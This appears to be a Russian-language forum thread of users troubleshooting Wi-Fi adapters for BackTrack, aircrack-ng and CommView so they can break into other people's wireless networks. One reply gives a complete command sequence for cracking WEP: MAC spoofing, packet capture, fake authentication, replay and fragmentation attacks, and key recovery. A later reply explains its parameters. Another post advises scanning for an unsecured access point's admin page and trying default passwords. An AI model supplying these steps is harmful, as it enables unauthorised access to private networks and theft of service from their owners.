![]() |
Всем доброго времени суток. Сталкунлся с такой проблемой. Купил вай фай модуль D-Link DWA-110.
Как и было сказано в одной из тем выпаял микросхему и установилR-Link драйвера. Девайс нашелся НО... Не могу сделать сеть между двумя компьютерами Ad-Hoc. В системном трее висит крестик(дисконект). Если не трудно помогите пожалуйста разобраться. Профиль создал, SSID указал, что за сеть тоже... при сканировании не находит :( |
Спасибо я так и думал но увы это уже будет кабельный интернет а мне нужен беспроводной !!! А на счёт IP возможно я что то путаю. Но под Wi-fi есть наклеена бумажка где указан IP xx.xxx.xxxx и Логин с паролем ( Вот только как это тогда понять )
З.ы. Wi-fi класса "TL-WR340GD" |
Требуется помощь.Скачал BackTrack, но он не видит адаптер. Использую нетбук Dell Inspiron mini 1011, сетевая плата Dell Wireless 1397 WLAN Mini-Card. Реально ли вообще ломать на ней WEP или WPA, если да, то где взять дрова? Заранее благодарю.
ОС Windows XP Home Edition / BackTrack 3 USB Version |
Появилься вопросик... Вот пишут, что нвидиа повышает перебор паролей в секунду, а как сделать, чтобы она активно учавствовала в этом переборе?
И еще airowizard не хочет запускаться, пишет ошибку, REGDB_E_CLASSNOTREG(0x80040154). и не знаю что с этим делать, и переустанавливал framework... А на другом пашет, только прохо что там нет pcmcia входа :( |
существует вообще какой нибуть софт для вардрайвинга Intel(R) WiFi Link 5100???
|
Цитата:
больше всего что нету.... |
Цитата:
|
попробовал bluetrack 4, не увидел карточку wifi в моем 1000h(rt2860?)
Что делать? |
Цитата:
|
ок
я собственно попробовал bt3, не получилось, и попробовал компитьнуть дрова с сайта(в 4ке), тоже не прокатило( |
сть карточка ASUS WL-167G. На сайте aircrack-ng нашел ,что эта прога работает с этой карточкой тока из - под линя.Линь мне не охота ставить ,поэтому возникает вопрос : как настроить wi-fi адаптер для работы из-под венды с aircrack-ng?
спасибо за ответы! |
Цитата:
|
Цитата:
ладно, шучу, вот решение твоей проблемы: http://forum.eeeuser.com/viewtopic.php?id=36223 Цитата:
|
Здрасте. Я в хаке wifi не ламер. мой прошлый nick - _SEREGA_.
Так вот чтобы провести чоп-чоп атаку. надо прежде ассоциироваться с ТД. в бактраке 3 финал - всё было без проблем, а вот в бактраке 4 финал я делаю всё стандартным образом, но на попытку асоссоцииации с ТД я получаю вот это Цитата:
и так повторяется всё время... в чём трабла? в третем всё зашибись было! а карта у меня broadcom4312 пс надеюсь есть знающие люди |
Цитата:
Сперва меняем мак. airmon-ng stop wlan0 ifconfig wlan0 down macchanger -m 00:11:22:33:44:55 wlan0 airmon-ng start wlan0 сканируем эфир: airodump-ng mon0 выбираем точку и останавливаем airodump-ng // airmon-ng stop mon0 подсаживаемся на канал : airmon-ng start wlan0 11 и запускаем airodump-ng / на сбор пакетов airodump-ng -c 11 -w wep --bssid 11:44:98:56:77:44 mon0 атакуем : подставляем свой изменённый мак при атаке : -h 00:11:22:33:44:55 aireplay-ng -1 0 -a 11:44:98:56:77:44 -h 00:11:22:33:44:55 mon0 в другом окне делаем fragment atack aireplay-ng -3 -b 11:44:98:56:77:44 -h 00:11:22:33:44:55 mon0 открываем ещё окно и атакуем с фильтрацией нужных пакетов: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:00:00:00:00 -h 00:11:22:33:44:55 ждём предложения на открытие пакета : получив его отрываем fragment paket Y запускаем aircrack-ng aircrack-ng wep-01.cap |
есть у каво eee s101 ?
мужики помогите, ноут asus s101h пытаюсь менять МАК на wifi он меняется но после этого немогу подключиться ни к одной точке доступа даже к своей, пишет что то навроде вы не в зоне действия сети попробуйте обновить список (менял в свойствах адаптера и специальными прогами такая же фигня), фильтрации по МАКам на точках нет, что это может быть? можеть есть какая нибудь хитрость? это всё под Вин. В Линухе подключаться к точке пробовал даже с реальным маком но неполучается |
....
Здаравствуйте =) Мне нужна ваша помощь у меня ноут HP ProBook 4510s, карточка там Broadcom, смогу ли я на нём работать с AiroWizard???
Зарание спасибо =) |
Почему винда не видет wifi сеть, а bt3 видит?
|
Всем привет.
Ноут Asus Pro5DAB Atheros AR9285 802.11b/g Wireless Network Adapter PCI Есть ли какой-то софт под это дело чтобы вай-фай коцать? Перерыл гугл ниче не нашел толкового. В основных программах поддержки моего адаптера нет. Такого острого вопроса с нетом не стояло, поэтому когда ноут брал не обратил внимание на это. А счас в Англию жить еду, а там нет проблемно подключать на съемную хату. Спасибо всем. |
Цитата:
есть пару вопросов) что в конце подставлять в 00:00:00:00:00:00 и FF:FF:FF:FF:FF:FF? пакеты идут во всех окнах, какие учитывать? |
Цитата:
|
Цитата:
я тоже обладатель данного девайса , и тоже ощутил проблему с win программами зато в linux все тип топ , но пока только осваиваю . |
Цитата:
|
Цитата:
|
Цитата:
|
Спасибо большое ))) Буду пробывать ))
|
Скажите, кто нибудь пробовал менять мак адрес адаптера?
У меня ноутбук Aspire one, адаптер Atheros AR5007eg. Я менял в ХР мак адрес (первые три значения я оставлял 00:22:68, так как это говорит о том, что адаптер асеросовский), но ни к одной беспроводной сети я не мог подключиться. В Убунту 9.04 тоже пробовал. Менял вот так ifconfig ath0 hw ether 00:22:68:ba:75:12 к своей точке доступа подсоединяюсь нормально, но пингануть ее не могу. ip везде стоят из одной подсети. Кто сталкивался со сменой мак адресов? Проблемы были или все гладко работало? |
подскажите програмы для вардрайвинга, Адаптер Atheros AR9285 wireles network adapter, ОС Vista ultimate sp2, немогу разобратся с перехватом ключей, подскажите!!!
И еще вопрос какой модуль ядра с моим адаптером в BT3 немогу произвести атаку |
Цитата:
Я BT4 гоняю , все работает . |
Цитата:
ничего не вышло(( |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Все делаю по инструкциям на форуме. |
Всем доброго времени суток. Пожалуйста не пинайте, я новичек. Форум читал, но информации много, не нашел ситуации как у меня. После установки дров на нетбук Samsung 308 (чипсет Atheros AR 5007EG) сразу появилось сообщение, что найдена беспроводная сеть «HOME»,что сигнал очень слабый(одна палочка) и сеть незащищенная. Однако я без проблем вышел в инет(скорость показыв. 54 М/cек). И от души полазил в Интернете. Это продолжалось 2дня. После этого выйти больше не мог, комп. писал что соединения либо нет, либо доступ ограничен. Я понял что мне запретили доступ. Загорелся взломать точку, стал читать литературу, собирать проги для взлома. После установки Commview for WIFI (чипсет стал определяться как Atheros AR5006X) я увидел что сеть «HOME» вообще не имеет шифрования и что всего то нужно (как написано на форуме) подставить любой IP-адрес отображающийся в Commview. Адрес IP я прописал(пробовал разные, их в проге отображалось много),комп затребовал маску подсети, т.к. у меня на не ее данных нет, я опять нажал ОК и маска прописалась какая-то автоматом. После этого комп показал, что WIFI соединение с сетью «HOME» установлено. НО в инет я выйти не могу,хотя сигнал в некоторых углах комнаты 25%. Вопрос: что я делаю неправильно,в чем моя ошибка?
Пробовал вернуться к родным дровам, но ситуация та же. Беспроводное соединение с сетью установлено, а Интернета нет. Чудеса! Может надо еще какие-то параметры прописывать! Спасибо за ответ! |
Alexandrcvet, у меня такой же адаптер на ноуте. А в CommViewForWiFi есть драйвера не под все адаптеры, в частности под наш нету, но есть под его предыдущую версию который канает. Правда у меня на этих дровах при работе в сети ноут иногда зависает, поэтому использую их только когда работаю с CommView. Жаль ты не записал сетевые настройки, когда они автоматом выдавались. Щас бы вбил их и возможно все работало бы. Наверное надо шлюз правильный прописать, а может там теперь выход в инет через прокси-сервер. Попробуй понаблюдать за работой сети в CommView. Может увидишь какие пакеты от какого ip к какому летят и разберешься что к чему.
|
Щас еще мысля посетила. Если на сеть пароль не поставили, попробуй вломиться в настройки точки доступа. Подключаешься к сети, сканируешь этот диапазон ip адресов каким нибудь сканером и находишь то сетевое устройство, на котором открыт 80-й порт. На АР он обычно открыт, чтобы можно было через веб-интерфейс их настраивать. Нашел ip, вводишь его в браузер и должно появиться окно для ввода пароля. Пробуй стандартные (и запиши название точки доступа). Если пройдешь внутрь, то полазь в настройках сетевых, там должен быть шлюз.
|
Настройка сети через WIFI
Есть интернет через ADSL модем + PCI карта D-LINK DWA 547 на одном компе и на другом PCI карта D-LINK DWL G550
Нужно настроить сеть между компами и дать инет через WIFI Подскажите, что в этих картах нужно настраивать? Что писать в свойствах TCPIP ? Что можно почитать по теме? Спасибо. |
Если в ADSL модем встроена точка доступа, то можно создать инфраструктуру. То есть интернет будет приходить через ADSL и раздаваться остальным компьютерам по Wi-Fi.
А если точки доступа нет, то придется создавать одноранговую сеть, то бишь без точки доступа. Но это не очень удобно. Придется подключить компьютер к модему (витой парой) чтобы получать интернет, а потом еще между компьютерами настроить ту самую adhoc сеть и при этом разрешить использовать модемное соединение всем пользователям беспроводной сети. Я описывал создание такой сети вот здесь http://liveofpc.ru/publ/1-1-0-123 там используются средства виндовс, но с адаптерами идут драйвера и специальные программы, которыми тоже можно воспользоваться. Если возникнут вопросы, описывай их поподробнее. Попробуем разобраться вместе. |
Цитата:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b ---- эту строку пишешь как есть где 00:00:00:00:00:00 ---в место нулей bssid точки -h 00:11:22:33:44:55 mon0 --- это твой bssid который менял раньше в других окнах пусть пакеты бегут само собой следи за этим окном , жди предложения на открытие этого пакета p 084 после сбора 11000 пакетов запускаешь aircrack-ng --не закрывая ни каких окон --- 11000 --смотришь в airodumpe -- и ожидаешь ключ сети aircrack-ng --сам будет добавлять пакеты если их мало если интересует можешь зайти по этой ссылке -- http://www.corelan.be:8800/index.php/2009/02/20/cheatsheet-cracking-wep-with-backtrack-4-and-aircrack-ng/ |
| Время: 22:03 |